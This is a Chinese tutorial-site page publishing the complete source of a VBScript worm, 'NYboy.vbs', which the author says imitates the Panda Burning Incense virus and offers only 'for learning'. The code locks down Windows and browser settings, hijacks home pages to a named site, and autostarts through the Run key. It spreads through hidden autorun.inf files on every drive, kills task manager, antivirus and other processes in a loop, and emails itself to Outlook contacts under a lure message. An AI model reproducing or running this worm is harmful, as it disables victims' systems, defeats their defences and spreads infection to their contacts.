当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > NYboy.vbs病毒源代码公布,我来模拟熊猫烧香

VBScript
用vbs检索在运行对话框中键入的一系列命令的代码
编写可以打开文本文件并打乱在该文件中所找到的单词顺序的vbs脚本
在 HTA 中暂停脚本的方法
运行脚本之前,如何确定计算机上的默认脚本宿主的代码
用vbs实现删除名称中有撇号的文件夹
用vbs将输出内容写到屏幕以覆盖当前屏幕上的内容的方法
用vbs实现配置无人登录计算机时使用的屏幕保护程序
用vbs更改 Internet Explorer 的标题栏
用vbs读取文本文件的最后一行
用vbs实现重新启动 Internet Explorer
用vbs实现禁用服务
用vbs确定计算机是否有 USB 2.0 端口的代码
用vbs列出注册表中 Run 项中的所有项目
用vbs将名称截断以使其最多包含 16 个字符的代码
用vbs将本地文件替换为在文件服务器上找到的新版本
用vbs确定脚本正在哪一个帐户下运行
用vbs确定可移动驱动器的连接时间
用vbs记录屏幕保护程序的开始时间和结束时间
用vbs计算某个词在日志文件中的出现次数
vbs病毒的简单例子源代码解析

VBScript 中的 NYboy.vbs病毒源代码公布,我来模拟熊猫烧香


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 63 ::
收藏到网摘: n/a

使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_
&"&& echo open=NYboy.bat >>C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&& echo shell=Auto>>C:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_
&"&& echo open=NYboy.bat >>D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&& echo shell=Auto>>D:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_
&"&& echo open=NYboy.bat >>E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&& echo shell=Auto>>E:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_
&"&& echo open=NYboy.bat >>F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&& echo shell=Auto>>F:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_
&"&& echo open=NYboy.bat >>I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&& echo shell=Auto>>I:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit